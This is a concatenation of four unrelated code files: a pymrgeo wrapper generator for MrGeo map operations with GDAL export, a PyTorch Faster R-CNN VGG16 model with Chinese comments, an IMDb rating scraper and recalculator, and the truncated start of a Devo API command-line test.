"/": [["__div__", "__truediv__", "__idiv__", "__itruediv__"], ["__rdiv__", "__rtruediv__"]],
"//": [[], []], # floor div
"**": [["__pow__", "__ipow__"], ["__rpow__"]], # pow
"=": [], # assignment, can't do!
"<": [["__lt__"], []],
"<=": [["__le__"], []],
">": [["__gt__"], []],
">=": [["__ge__"], []],
"==": [["__eq__"], []],
"!=": [["__ne__"], []],
"<>": [[], []],
"!": [[], []],
"&&": [[], []], # can't override logical and
"&": [["__and__", "__iand__", "__rand__"], []],
"||": [[], []], # can't override logical or
"|": [["__or__", "__ior__", "__ror__"], []],
"~": [["__invert__"], []],
"^": [["__xor__", "__ixor__", "__rxor__"], []],
"^=": [[], []]}
_reserved = ["or", "and", "str", "int", "long", "float", "bool"]
_mapop_code = {}
_rastermapop_code = {}
_vectormapop_code = {}
_initialized = False
def _exceptionhook(ex_cls, ex, tb, method_name=None):
stack = traceback.extract_tb(tb)
print(ex_cls.__name__ + ' (' + str(ex) + ')', file=sys.stderr)
for st in stack:
file = st[0]
line = st[1]
method = st[2]
srccode = st[3]
cls = None
code = None
if file == method + '.py':
if _rastermapop_code.has_key(method):
code = _rastermapop_code[method]
cls = 'RasterMapOp'
elif _vectormapop_code.has_key(method):
code = _vectormapop_code[method]
cls = 'VectorMapOp'
elif _mapop_code.has_key(method):
code = _mapop_code[method]
cls = 'MapOp'
else:
pass
if code:
print(' File <' + cls + '.internal>, line ' +
str(line) + ', in ' + cls + '.' + method.strip(), file=sys.stderr)
srccode = code.generate().split('\n')
cnt = 1
for c in srccode:
if cnt == line:
print('==> ' + c + ' <==', file=sys.stderr)
else:
print(' ' + c, file=sys.stderr)
cnt += 1
else:
print(' File "' + file.strip() + '", line ' +
str(line) + ', in ' + method.strip(), file=sys.stderr)
print(' ' + srccode.strip() if srccode else "<unknown file>", file=sys.stderr)
print(''.join(traceback.format_tb(tb)))
print('{0}: {1}'.format(ex_cls, ex))
# Always setup the hook
sys.excepthook = _exceptionhook
def generate(mrgeo, gateway, gateway_client):
global _initialized
if _initialized:
# Make sure the object have the proper code in them. In case somewhere we've made a new mrgeo object
for method_name, code in _mapop_code.items():
if not hasattr(mrgeo, method_name):
setattr(mrgeo, method_name, code.compile(method_name).get(method_name))
for method_name, code in _rastermapop_code.items():
if not hasattr(RasterMapOp, method_name):
setattr(RasterMapOp, method_name, code.compile(method_name).get(method_name))
for method_name, code in _vectormapop_code.items():
if not hasattr(VectorMapOp, method_name):
setattr(VectorMapOp, method_name, code.compile(method_name).get(method_name))
return
jvm = gateway.jvm
client = gateway_client
java_import(jvm, "org.mrgeo.job.*")
java_import(jvm, "org.mrgeo.mapalgebra.MapOpFactory")
java_import(jvm, "org.mrgeo.mapalgebra.raster.RasterMapOp")
java_import(jvm, "org.mrgeo.mapalgebra.vector.VectorMapOp")
java_import(jvm, "org.mrgeo.mapalgebra.raster.MrsPyramidMapOp")
java_import(jvm, "org.mrgeo.mapalgebra.IngestImageMapOp")
java_import(jvm, "org.mrgeo.mapalgebra.ExportMapOp")
java_import(jvm, "org.mrgeo.mapalgebra.PointsMapOp")
java_import(jvm, "org.mrgeo.mapalgebra.MapOp")
java_import(jvm, "org.mrgeo.utils.SparkUtils")
java_import(jvm, "org.mrgeo.hdfs.utils.HadoopFileUtils")
java_import(jvm, "org.mrgeo.data.*")
mapops = jvm.MapOpFactory.getMapOpClasses()
for rawmapop in mapops:
mapop = str(rawmapop.getCanonicalName().rstrip('$'))
# Skip IngestImageMapOp because there is an explicit method defined in
# MrGeo class for ingesting an image, and _get_instance_type will raise
# an exception when run against that map op.
if not mapop.endswith(".IngestImageMapOp") and not mapop.endswith(".InlineCsvMapOp"):
java_import(jvm, mapop)
cls = JavaClass(mapop, gateway_client=client)
signatures = jvm.MapOpFactory.getSignatures(mapop)
instance = _get_instance_type(signatures, gateway, cls, mapop)
# for s in signatures:
# print("signature: " + s)
for method in cls.register():
ooCodes = None
procCodes = None
if method is not None:
name = method.strip().lower()
if len(name) > 0:
if name in _reserved:
# print("reserved: " + name)
continue
elif name in _operators:
# print("operator: " + name)
ooCodes = _generate_operator_code(mapop, name, signatures, instance)
else:
# print("method: " + name)
ooCodes = _generate_oo_method_code(gateway, client, mapop, name, signatures, instance)
procCodes = _generate_procedural_method_code(gateway, client, mapop, name, signatures,
instance)
if ooCodes is not None:
for method_name, code in ooCodes.items():
# if method_name == "export":
# print(code.generate(), file=sys.stderr)
if instance == 'RasterMapOp':
_rastermapop_code[method_name] = code
setattr(RasterMapOp, method_name, code.compile(method_name).get(method_name))
elif instance == "VectorMapOp":
_vectormapop_code[method_name] = code
setattr(VectorMapOp, method_name, code.compile(method_name).get(method_name))
elif is_instance_of(gateway, cls, jvm.MapOp):
# _mapop_code[method_name] = code
_rastermapop_code[method_name] = code
setattr(RasterMapOp, method_name, code.compile(method_name).get(method_name))
_vectormapop_code[method_name] = code
setattr(VectorMapOp, method_name, code.compile(method_name).get(method_name))
if procCodes is not None:
for method_name, code in procCodes.items():
print(method_name)
_mapop_code[method_name] = code
setattr(mrgeo, method_name, code.compile(method_name).get(method_name))
_initialized = True
print("add: " + str(hasattr(mrgeo, "add")))
def _get_instance_type(signatures, gateway, cls, mapop):
type_map = {'RasterMapOp': 0, 'VectorMapOp': 0, 'MapOp': 0}
for sig in signatures:
has_type = {'RasterMapOp': False, 'VectorMapOp': False, 'MapOp': False}
for variable in sig.split("|"):
# print("variable: " + variable)
names = re.split("[:=]+", variable)
new_type = names[1][names[1].rfind('.') + 1:]
if new_type.endswith("*"):
new_type = new_type[:-1]
if new_type == 'RasterMapOp' or new_type == 'VectorMapOp' or new_type == 'MapOp':
has_type[new_type] = True
for t, v in has_type.iteritems():
if v:
type_map[t] += 1
# Make sure that all of the signatures have an argument of one of the map op types.
# If the map op is either RasterMapOp or VectorMapOp, and all of the signatures have
# an argument of that type, then use that for the instance type.
if is_instance_of(gateway, cls, 'org.mrgeo.mapalgebra.raster.RasterMapOp'):
if type_map['RasterMapOp'] == len(signatures):
return 'RasterMapOp'
elif is_instance_of(gateway, cls, 'org.mrgeo.mapalgebra.vector.VectorMapOp'):
if type_map['VectorMapOp'] == len(signatures):
return 'VectorMapOp'
# There is at least one signature that does not include a parameter of the same type
# as the map op itself. Instead, we get a type that is represented in all the signatures.
for t, v in type_map.iteritems():
if v == len(signatures):
return t
msg = 'Cannot determine an instance type to use for ' + mapop
print(msg)
raise Exception(msg)
def _generate_operator_code(mapop, name, signatures, instance):
methods = _generate_methods(instance, signatures)
if len(methods) == 0:
return None
# need to change the parameter names to "other" for all except us
corrected_methods = []
for method in methods:
new_method = []
if len(method) > 2:
raise Exception("The parameters for an operator can only have 1 or 2 parameters")
for param in method:
lst = list(param)
if lst[1].lower() == 'string' or \
lst[1].lower() == 'double' or \
lst[1].lower() == 'float' or \
lst[1].lower() == 'long' or \
lst[1].lower() == 'int' or \
lst[1].lower() == 'short' or \
lst[1].lower() == 'char' or \
lst[1].lower() == 'boolean':
lst[0] = "other"
lst[2] = "other"
# need to add this to the start of the list (in case we eventually check other.mapop from the elif
elif lst[2] != "self":
lst[0] = "other"
lst[2] = "other"
new_method.append(tuple(lst))
corrected_methods.append(new_method)
codes = {}
for op_index in range(0, 2):
for mname in _operators[name][op_index]:
# print("Processing " + mname)
generator = CodeGenerator()
# Signature
if len(corrected_methods) == 1:
generator.write("def " + mname + "(self):", post_indent=True)
else:
generator.write("def " + mname + "(self, other):", post_indent=True)
# code += " print('" + name + "')\n"
_generate_imports(generator, mapop)
_generate_calls(generator, corrected_methods, is_reverse=True if op_index == 1 else False)
_generate_run(generator, instance)
codes[mname] = generator
return codes
def _generate_oo_method_code(gateway, client, mapop, name, signatures, instance):
methods = _generate_methods(instance, signatures)
# print("working on " + name)
jvm = gateway.jvm
cls = JavaClass(mapop, gateway_client=client)
is_export = is_remote() and is_instance_of(gateway, cls, jvm.ExportMapOp)
if len(methods) == 0:
return None
signature = _generate_oo_signature(methods)
generator = CodeGenerator()
# Signature
generator.write("def " + name + "(" + signature + "):", post_indent=True)
# code += " print('" + name + "')\n"
_generate_imports(generator, mapop, is_export)
_generate_calls(generator, methods, is_export=is_export)
_generate_run(generator, instance, is_export)
# print(code)
return {name: generator}
def _generate_procedural_method_code(gateway, client, mapop, name, signatures, instance):
methods = _generate_methods(instance, signatures)
# print("working on " + name)
if (name == "add"):
pass
jvm = gateway.jvm
cls = JavaClass(mapop, gateway_client=client)
is_export = is_remote() and is_instance_of(gateway, cls, jvm.ExportMapOp)
if len(methods) == 0:
return None
signature, self_method = _generate_proc_signature(methods)
generator = CodeGenerator()
# Signature
generator.write("def " + name + "(" + signature + "):", post_indent=True)
# code += " print('" + name + "')\n"
_generate_imports(generator, mapop, is_export)
_generate_calls(generator, methods, is_export=is_export)
_generate_run(generator, instance, is_export)
# print(code)
code = generator.generate()
code = code.replace("self", self_method)
generator.begin()
for line in code.split("\n"):
generator.write(line)
return {name: generator}
def _generate_run(generator, instance, is_export=False):
if is_export:
ex_generator = _generate_saveraster()
generator.append(ex_generator)
generator.force_level(generator.get_level() + ex_generator.get_level())
else:
# Run the MapOp
generator.write("if (op.setup(self.job, self.context.getConf()) and", post_indent=True)
generator.write("op.execute(self.context) and")
generator.write("op.teardown(self.job, self.context.getConf())):")
# Return a new python RasterMapOp or VectorMapOp to wrap the Java MapOp
generator.write("if is_instance_of(self.gateway, op, 'org.mrgeo.mapalgebra.raster.RasterMapOp'):",
post_indent=True)
generator.write(
"new_resource = RasterMapOp(gateway=self.gateway, context=self.context, mapop=op, job=self.job)",
post_unindent=True)
generator.write("elif is_instance_of(self.gateway, op, 'org.mrgeo.mapalgebra.vector.VectorMapOp'):",
post_indent=True)
generator.write(
"new_resource = VectorMapOp(gateway=self.gateway, context=self.context, mapop=op, job=self.job)",
post_unindent=True)
generator.write("else:", post_indent=True)
generator.write("raise Exception('Unable to wrap a python object around returned map op: ' + str(op))",
post_unindent=True)
generator.write("return new_resource", post_unindent=True)
generator.write("return None")
return generator
def _generate_saveraster():
generator = CodeGenerator()
# generator.write("cls = JavaClass('org.mrgeo.mapalgebra.ExportMapOp', gateway_client=self.gateway._gateway_client)")
# generator.write(
# "if hasattr(self, 'mapop') and self.is_instance_of(self.mapop, 'org.mrgeo.mapalgebra.raster.RasterMapOp') and type(name) is str and isinstance(singleFile, (int, long, float, str)) and isinstance(zoom, (int, long, float)) and isinstance(numTiles, (int, long, float)) and isinstance(mosaic, (int, long, float)) and type(format) is str and isinstance(randomTiles, (int, long, float, str)) and isinstance(tms, (int, long, float, str)) and type(colorscale) is str and type(tileids) is str and type(bounds) is str and isinstance(allLevels, (int, long, float, str)) and isinstance(overridenodata, (int, long, float)):",
# post_indent=True)
# generator.write(
# "op = cls.create(self.mapop, str(name), True if singleFile else False, str(""), int(zoom), int(numTiles), int(mosaic), str(format), True if randomTiles else False, True if tms else False, str(colorscale), str(tileids), str(bounds), True if allLevels else False, float(overridenodata))",
# post_unindent=True)
# generator.write("else:", post_indent=True)
# generator.write("raise Exception('input types differ (TODO: expand this message!)')", post_unindent=True)
generator.write("if (op.setup(self.job, self.context.getConf()) and", post_indent=True)
generator.write("op.execute(self.context) and")
generator.write("op.teardown(self.job, self.context.getConf())):")
generator.write("if is_instance_of(self.gateway, op, 'org.mrgeo.mapalgebra.raster.RasterMapOp'):", post_indent=True)
generator.write("new_resource = RasterMapOp(gateway=self.gateway, context=self.context, mapop=op, job=self.job)",
post_unindent=True)
generator.write("elif is_instance_of(self.gateway, op, 'org.mrgeo.mapalgebra.vector.VectorMapOp'):",
post_indent=True)
generator.write("new_resource = VectorMapOp(gateway=self.gateway, context=self.context, mapop=op, job=self.job)",
post_unindent=True)
generator.write("else:", post_indent=True)
generator.write("raise Exception('Unable to wrap a python object around returned map op: ' + str(op))",
post_unindent=True)
generator.write("gdalutils = JavaClass('org.mrgeo.utils.GDALUtils', gateway_client=self.gateway._gateway_client)")
generator.write("java_image = op.image()")
generator.write("width = java_image.getRasterXSize()")
generator.write("height = java_image.getRasterYSize()")
generator.write("options = []")
generator.write("if format == 'jpg' or format == 'jpeg':", post_indent=True)
generator.write("driver_name = 'jpeg'")
generator.write("extension = 'jpg'", post_unindent=True)
generator.write(
"elif format == 'tif' or format == 'tiff' or format == 'geotif' or format == 'geotiff' or format == 'gtif' or format == 'gtiff':",
post_indent=True)
generator.write("driver_name = 'GTiff'")
generator.write("options.append('INTERLEAVE=BAND')")
generator.write("options.append('COMPRESS=DEFLATE')")
generator.write("options.append('PREDICTOR=1')")
generator.write("options.append('ZLEVEL=6')")
generator.write("options.append('TILES=YES')")
generator.write("if width < 2048:", post_indent=True)
generator.write("options.append('BLOCKXSIZE=' + str(width))", post_unindent=True)
generator.write("else:", post_indent=True)
generator.write("options.append('BLOCKXSIZE=2048')", post_unindent=True)
generator.write("if height < 2048:", post_indent=True)
generator.write("options.append('BLOCKYSIZE=' + str(height))", post_unindent=True)
generator.write("else:", post_indent=True)
generator.write("options.append('BLOCKYSIZE=2048')", post_unindent=True)
generator.write("extension = 'tif'", post_unindent=True)
generator.write("else:", post_indent=True)
generator.write("driver_name = format")
generator.write("extension = format", post_unindent=True)
generator.write("datatype = java_image.GetRasterBand(1).getDataType()")
generator.write("if not local_name.endswith(extension):", post_indent=True)
generator.write("local_name += '.' + extension", post_unindent=True)
generator.write("driver = gdal.GetDriverByName(driver_name)")
generator.write(
"local_image = driver.Create(local_name, width, height, java_image.getRasterCount(), datatype, options)")
generator.write("local_image.SetProjection(str(java_image.GetProjection()))")
generator.write("local_image.SetGeoTransform(java_image.GetGeoTransform())")
generator.write("java_nodatas = gdalutils.getnodatas(java_image)")
generator.write("print('saving image to ' + local_name)")
generator.write(
"print('downloading data... (' + str(gdalutils.getRasterBytes(java_image, 1) * local_image.RasterCount / 1024) + ' kb uncompressed)')")
generator.write("for i in xrange(1, local_image.RasterCount + 1):", post_indent=True)
generator.write("start = time.time()")
generator.write("raw_data = gdalutils.getRasterDataAsCompressedBase64(java_image, i, 0, 0, width, height)")
generator.write("print('compressed/encoded data ' + str(len(raw_data)))")
generator.write("decoded_data = base64.b64decode(raw_data)")
generator.write("print('decoded data ' + str(len(decoded_data)))")
generator.write("decompressed_data = zlib.decompress(decoded_data, 16 + zlib.MAX_WBITS)")
generator.write("print('decompressed data ' + str(len(decompressed_data)))")
generator.write("byte_data = numpy.frombuffer(decompressed_data, dtype='b')")
generator.write("print('byte data ' + str(len(byte_data)))")
generator.write("image_data = byte_data.view(gdal_array.GDALTypeCodeToNumericTypeCode(datatype))")
generator.write("print('gdal-type data ' + str(len(image_data)))")
generator.write("image_data = image_data.reshape((-1, width))")
generator.write("print('reshaped ' + str(len(image_data)) + ' x ' + str(len(image_data[0])))")
generator.write("band = local_image.GetRasterBand(i)")
generator.write("print('writing band ' + str(i))")
generator.write("band.WriteArray(image_data)")
generator.write("end = time.time()")
generator.write("print('elapsed time: ' + str(end - start) + ' sec.')")
generator.write("band.SetNoDataValue(java_nodatas[i - 1])", post_unindent=True)
generator.write("local_image.FlushCache()")
return generator
def _generate_imports(generator, mapop, is_export=False):
# imports
generator.write("from pymrgeo.instance import is_instance_of")
generator.write("from pymrgeo import RasterMapOp")
generator.write("from pymrgeo import VectorMapOp")
generator.write("from numbers import Number")
if is_export:
generator.write("import base64")
generator.write("import numpy")
generator.write("from osgeo import gdal, gdal_array")
generator.write("import time")
generator.write("import zlib")
generator.write("from py4j.java_gateway import JavaClass")
# Get the Java class
generator.write("cls = JavaClass('" + mapop + "', gateway_client=self.gateway._gateway_client)")
def _generate_calls(generator, methods, is_export=False, is_reverse=False):
# Check the input params and call the appropriate create() method
firstmethod = True
varargcode = CodeGenerator()
if is_export:
generator.write("local_name = name")
generator.write("name = 'In-Memory'")
for method in methods:
iftest = ""
call = []
firstparam = True
for param in method:
var_name = param[0]
type_name = param[1]
call_name = param[2]
default_value = param[3]
# print("param => " + str(param))
# print("var name: " + var_name)
# print("type name: " + type_name)
# print("call name: " + call_name)
if param[4]:
call_name, it, et, accessor = _method_name(type_name, "arg", None)
varargcode.write("for arg in args:", post_indent=True)
varargcode.write("if isinstance(arg, list):", post_indent=True)
varargcode.write("arg_list = arg")
varargcode.write("for arg in arg_list:", post_indent=True)
varargcode.write("if not(" + it + "):", post_indent=True)
varargcode.write("raise Exception('input types differ (TODO: expand this message!)')")
varargcode.unindent(3)
varargcode.write("else:", post_indent=True)
varargcode.write("if not(" + it + "):", post_indent=True)
varargcode.write("raise Exception('input types differ (TODO: expand this message!)')")
varargcode.unindent(2)
varargcode.write("elements = []")
varargcode.write("for arg in args:", post_indent=True)
varargcode.write("if isinstance(arg, list):", post_indent=True)
varargcode.write("for a in arg:", post_indent=True)
varargcode.write("elements.append(a" + accessor + ")")
varargcode.unindent(2)
varargcode.write("else:", post_indent=True)
varargcode.write("elements.append(arg" + accessor + ")")
varargcode.unindent(2)
varargcode.write("array = self.gateway.new_array(self.gateway.jvm." + type_name + ", len(elements))")
varargcode.write("cnt = 0")
varargcode.write("for element in elements:", post_indent=True)
varargcode.write("array[cnt] = element")
varargcode.write("cnt += 1")
call_name = "array"
else:
if firstparam:
firstparam = False
if firstmethod:
firstmethod = False
iftest += "if"
else:
iftest += "elif"
else:
iftest += " and"
if call_name == "self":
var_name = call_name
call_name, it, et, accessor = _method_name(type_name, var_name, default_value)
iftest += it
call += [call_name]
if len(varargcode) > 0:
generator.append(varargcode)
if len(iftest) > 0:
generator.write(iftest + ":")
generator.indent()
if is_reverse:
generator.write("op = cls.rcreate(" + ", ".join(call) + ')', post_unindent=True)
else:
generator.write("op = cls.create(" + ", ".join(call) + ')', post_unindent=True)
generator.write("else:", post_indent=True)
generator.write("raise Exception('input types differ (TODO: expand this message!)')", post_unindent=True)
# code += " import inspect\n"
# code += " method = inspect.stack()[0][3]\n"
# code += " print(method)\n"
def _method_name(type_name, var_name, default_value):
if type_name == "String":
phrase = " type(" + var_name + ") is str"
if (default_value is not None and default_value == 'None'):
iftest = " (" + var_name + " is None or" + phrase + ")"
else:
iftest = phrase
# call_name = "str(" + var_name + ")"
call_name = "str(" + var_name + ") if (" + var_name + " is not None) else None"
excepttest = "not" + iftest
accessor = ""
elif type_name == "double" or type_name == "float":
iftest = " isinstance(" + var_name + ", (int, long, float))"
# call_name = "float(" + var_name + ")"
call_name = "float(" + var_name + ") if (" + var_name + " is not None) else None"
excepttest = "not" + iftest
accessor = ""
elif type_name == "long":
iftest = " isinstance(" + var_name + ", (int, long, float))"
# call_name = "long(" + var_name + ")"
call_name = "long(" + var_name + ") if (" + var_name + " is not None) else None"
excepttest = "not" + iftest
accessor = ""
elif type_name == "int" or type_name == "Short" or type_name == "Char":
iftest = " isinstance(" + var_name + ", (int, long, float))"
# call_name = "int(" + var_name + ")"
call_name = "int(" + var_name + ") if (" + var_name + " is not None) else None"
excepttest = "not" + iftest
accessor = ""
elif type_name == "boolean":
iftest = " isinstance(" + var_name + ", (int, long, float, str))"
call_name = "True if " + var_name + " else False"
excepttest = "not" + iftest
accessor = ""
elif type_name.endswith("MapOp"):
base_var = var_name
var_name += ".mapop"
phrase = " hasattr(" + base_var + ", 'mapop') and self.is_instance_of(" + var_name + ", '" + type_name + "')"
if (default_value is not None and default_value == 'None'):
iftest = " (" + var_name + " is None or" + phrase + ")"
else:
iftest = phrase
call_name = var_name
excepttest = " hasattr(" + base_var + ", 'mapop') and not self.is_instance_of(" + \
var_name + ", '" + type_name + "')"
accessor = ".mapop"
else:
phrase = " self.is_instance_of(" + var_name + ", '" + type_name + "')"
if (default_value is not None and default_value == 'None'):
iftest = " (" + var_name + " is None or" + phrase + ")"
else:
iftest = phrase
call_name = var_name
excepttest = "not" + iftest
accessor = ""
return call_name, iftest, excepttest, accessor
def _generate_methods(instance, signatures):
methods = []
for sig in signatures:
found = False
method = []
for variable in sig.split("|"):
# print("variable: " + variable)
names = re.split("[:=]+", variable)
new_name = names[0]
new_type = names[1]
# var args?
varargs = False
if new_type.endswith("*"):
new_type = new_type[:-1]
new_name = "args"
varargs = True
if len(names) == 3:
if names[2].lower() == "true":
new_value = "True"
elif names[2].lower() == "false":
new_value = "False"
elif names[2].lower() == "infinity":
new_value = "float('inf')"
elif names[2].lower() == "-infinity":
new_value = "float('-inf')"
elif names[2].lower() == "null":
new_value = "None"
else:
new_value = names[2]
else:
new_value = None
if ((not found) and
(new_type.endswith("MapOp") or
(instance is "RasterMapOp" and new_type.endswith("RasterMapOp")) or
(instance is "VectorMapOp" and new_type.endswith("VectorMapOp")))):
found = True
new_call = "self"
else:
new_call = new_name
tup = (new_name, new_type, new_call, new_value, varargs)
method.append(tup)
methods.append(method)
return methods
def _in_signature(param, signature):
for s in signature:
if s[0] == param[0]:
if s[1] == param[1]:
if s[3] == param[3]:
return True
else:
raise Exception("only default values differ: " + str(s) + ": " + str(param))
else:
raise Exception("type parameters differ: " + s[1] + ": " + param[1])
return False
def _generate_oo_signature(methods):
signature = []
dual = len(methods) > 1
for method in methods:
for param in method:
# print("Param: " + str(param))
if not param[2] == "self" and not _in_signature(param, signature):
signature.append(param)
if param[4]:
# var args must be the last parameter
break
sig = ["self"]
for s in signature:
if s[4]:
sig += ["*args"]
else:
if s[3] is not None:
if s[3].endswith("NaN"):
sig += [s[0] + "=float('nan')"]
else:
sig += [s[0] + "=" + s[3]]
elif dual:
sig += [s[0] + "=None"]
else:
sig += [s[0]]
return ",".join(sig)
def _generate_proc_signature(methods):
signature = []
dual = len(methods) > 1
self_var = None
for method in methods:
for param in method:
# print("Param: " + str(param))
if (not param[2] == "self" or self_var == None) and not _in_signature(param, signature):
signature.append(param)
if param[2] == "self" and self_var == None:
self_var = param[0]
if param[4]:
# var args must be the last parameter
break
sig = []
for s in signature:
if s[4]:
sig += ["*args"]
else:
if s[3] is not None:
if s[3].endswith("NaN"):
sig += [s[0] + "=float('nan')"]
else:
sig += [s[0] + "=" + s[3]]
elif dual and s[0] != self_var:
sig += [s[0] + "=None"]
else:
sig += [s[0]]
return ",".join(sig), self_var
|
from __future__ import absolute_import
import torch as t
from torch import nn
from torchvision.models import vgg16
from model.region_proposal_network import RegionProposalNetwork
from model.faster_rcnn import FasterRCNN
from model.roi_module import RoIPooling2D
from utils import array_tool as at
from utils.config import opt
def decom_vgg16():
# the 30th layer of features is relu of conv5_3
# 是否使用Caffe下载下来的预训练模型
if opt.caffe_pretrain:
model = vgg16(pretrained=False)
if not opt.load_path:
# 加载参数信息
model.load_state_dict(t.load(opt.caffe_pretrain_path))
else:
model = vgg16(not opt.load_path)
# 加载预训练模型vgg16的conv5_3之前的部分
features = list(model.features)[:30]
classifier = model.classifier
# 分类部分放到一个list里面
classifier = list(classifier)
# 删除输出分类结果层
del classifier[6]
# 删除两个dropout
if not opt.use_drop:
del classifier[5]
del classifier[2]
classifier = nn.Sequential(*classifier)
# 冻结vgg16前2个stage,不进行反向传播
for layer in features[:10]:
for p in layer.parameters():
p.requires_grad = False
# 拆分为特征提取网络和分类网络
return nn.Sequential(*features), classifier
# 分别对特征VGG16的特征提取部分、分类部分、RPN网络、
# VGG16RoIHead网络进行了实例化
class FasterRCNNVGG16(FasterRCNN):
# vgg16通过5个stage下采样16倍
feat_stride = 16 # downsample 16x for output of conv5 in vgg16
# 总类别数为20类,三种尺度三种比例的anchor
def __init__(self,
n_fg_class=20,
ratios=[0.5, 1, 2],
anchor_scales=[8, 16, 32]
):
# conv5_3及之前的部分,分类器
extractor, classifier = decom_vgg16()
# 返回rpn_locs, rpn_scores, rois, roi_indices, anchor
rpn = RegionProposalNetwork(
512, 512,
ratios=ratios,
anchor_scales=anchor_scales,
feat_stride=self.feat_stride,
)
# 下面讲
head = VGG16RoIHead(
n_class=n_fg_class + 1,
roi_size=7,
spatial_scale=(1. / self.feat_stride),
classifier=classifier
)
super(FasterRCNNVGG16, self).__init__(
extractor,
rpn,
head,
)
class VGG16RoIHead(nn.Module):
def __init__(self, n_class, roi_size, spatial_scale,
classifier):
# n_class includes the background
super(VGG16RoIHead, self).__init__()
# vgg16中的最后两个全连接层
self.classifier = classifier
self.cls_loc = nn.Linear(4096, n_class * 4)
self.score = nn.Linear(4096, n_class)
# 全连接层权重初始化
normal_init(self.cls_loc, 0, 0.001)
normal_init(self.score, 0, 0.01)
# 加上背景21类
self.n_class = n_class
# 7x7
self.roi_size = roi_size
# 1/16
self.spatial_scale = spatial_scale
# 将大小不同的roi变成大小一致,得到pooling后的特征,
# 大小为[300, 512, 7, 7]。利用Cupy实现在线编译的
self.roi = RoIPooling2D(self.roi_size, self.roi_size, self.spatial_scale)
def forward(self, x, rois, roi_indices):
# in case roi_indices is ndarray
# 前面解释过这里的roi_indices其实是多余的,因为batch_size一直为1
roi_indices = at.totensor(roi_indices).float() #ndarray->tensor
rois = at.totensor(rois).float()
indices_and_rois = t.cat([roi_indices[:, None], rois], dim=1)
# NOTE: important: yx->xy
xy_indices_and_rois = indices_and_rois[:, [0, 2, 1, 4, 3]]
# 把tensor变成在内存中连续分布的形式
# contiguous:view只能用在contiguous的variable上。
# 如果在view之前用了transpose, permute等,需要用
# contiguous()来返回一个contiguous copy。
indices_and_rois = xy_indices_and_rois.contiguous()
# 接下来分析roi_module.py中的RoI()
pool = self.roi(x, indices_and_rois)
# flat操作
pool = pool.view(pool.size(0), -1)
# decom_vgg16()得到的calssifier,得到4096
fc7 = self.classifier(pool)
# (4096->84)
roi_cls_locs = self.cls_loc(fc7)
# (4096->21)
roi_scores = self.score(fc7)
return roi_cls_locs, roi_scores
def normal_init(m, mean, stddev, truncated=False):
"""
weight initalizer: truncated normal and random normal.
"""
# x is a parameter
if truncated:
m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation
else:
m.weight.data.normal_(mean, stddev)
m.bias.data.zero_()
|
# python script that recalculates rating of imdb listing
# coded using python 3.6 with Spyder by <NAME> on 2017
import requests
import math
from bs4 import BeautifulSoup # html parser
# temporary algorithm to determine better score
def adjustExtremes(num10, num1, numPos, numNeg, numTotal):
if numTotal <= 0:
return [0, 0, 0, "!No ratings available!"]
if (num1 + num10) / numTotal > 0.33:
return removeExtremes(num10, num1, numPos, numNeg, numTotal)
if numPos > numNeg:
string = "Overall positive reception for "
else:
string = "Overall negative reception for "
if (numPos / numTotal) > 0.1:
numTotal = numTotal - num10
num10 = math.floor(num10 / 2)
numTotal = numTotal + num10
if (numNeg / numTotal) > 0.1:
numTotal = numTotal - num1
num1 = math.floor(num1 / 2)
numTotal = numTotal + num1
return [num10, num1, numTotal, string]
def removeExtremes(num10, num1, numPos, numNeg, numTotal):
MaxMin = numTotal - num10 - num1
return [0, 0, MaxMin, "Vote weights were corrected for "]
# average calculation
def findMMM(array, total):
# mode
i = 0
y = 0
temp = 0
for num in array:
if temp < num:
temp = num
y = i
i = i + 1
mode = 10 - y
# median
median = math.floor(total / 2)
i = 0
y = 0
for num in array:
y = y + num
if y >= median:
median = 10 - i
break
i = i + 1
# mean
i = 0
y = 0
mean = 0
for num in array:
y = 10 - i
mean = mean + num * y
i = i + 1
if total == 0:
return "!Insufficient ratings!"
mean = round(mean / total, 2)
string = "Mean: " + str(mean) + " Median: " + str(median) + " Mode: " + str(mode)
return string
def getRatings(title):
# takes an imdb id and name and returns a new rating
string = "http://www.imdb.com/title/" + title[0] + "/ratings"
myRequest = requests.get(string)
myContent = myRequest.content
myParsed = BeautifulSoup(myContent, "html.parser")
div = myParsed.find('div', {"class": 'title-ratings-sub-page'})
table = div.find_all('table')
lis = table[0].find_all("div", {"class": "leftAligned"})
# organizes filtered data
y = -1
num = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
for tag in lis:
## for debugging purposes ## print(tag.text)
if (y >= 0) & (y <= 9):
try:
stringBuffer = tag.text
num[y] = int(stringBuffer.replace(',', ''))
except AttributeError:
pass
y = y+1
# Operations with the data, to customize, alter adjustExtremes function
numPos = num[0] + num[1] + num[2] + num[3] + num[4]
numNeg = num[9] + num[8] + num[7] + num[6] + num[5]
numTot = numPos + numNeg
array = adjustExtremes(num[0], num[9], numPos, numNeg, numTot)
num[0] = array[0]
num[9] = array[1]
numTot = array[2]
return array[3] + title[1] + ":\n\n " + findMMM(num, numTot)
def findID(stringIN, index):
string = "http://www.imdb.com/find?q=" + stringIN + "&s=tt"
myRequest = requests.get(string)
myContent = myRequest.content
myParsed = BeautifulSoup(myContent, "html.parser")
td = myParsed.find_all('td', {"class": 'result_text'})
# tt = myParsed.find_all('h3', {"class": 'findSectionHeader'})
try:
myID1 = str(td[index])
myID1 = myID1.split('/', 3)
name = td[index].text.split(' aka', 2)
return getRatings([myID1[2], name[0]])
except IndexError:
return "No title found! Did you check your spelling?"
|
<filename>tests/api/cli.py
import unittest
import os
from click.testing import CliRunner
from devo.common import Configuration
from devo.api.scripts.client_cli import query
from devo.api.client import ERROR_MSGS, DevoClientException
class TestApi(unittest.TestCase):
def setUp(self):
self.query = 'from demo.ecommerce.data select * limit 1'
self.app_name = "testing-app_name"
self.uri = os.getenv('DEVO_API_ADDRESS',
'https://apiv2-us.devo.com/search/query')
self.key = os.getenv('DEVO_API_KEY', None)
self.secret = os.getenv('DEVO_API_SECRET', None)
self.token = os.getenv('DEVO_AUTH_TOKEN', None)
self.query_id = os.getenv('DEVO_API_QUERYID', None)
self.user = os.getenv('DEVO_API_USER', "python-sdk-user")
self.comment = os.getenv('DEVO_API_COMMENT', None)
configuration = Configuration()
configuration.set("api", {
"query": self.query, "address": self.uri,
"key": self.key, "secret": self.secret, "token": self.token,
"query_id": self.query_id, "user": self.user,
"comment": self.comment, "app_name": self.app_name
})
self.config_path = "/tmp/devo_api_tests_config.json"
configuration.save(path=self.config_path)
def test_query_args(self):
runner = CliRunner()
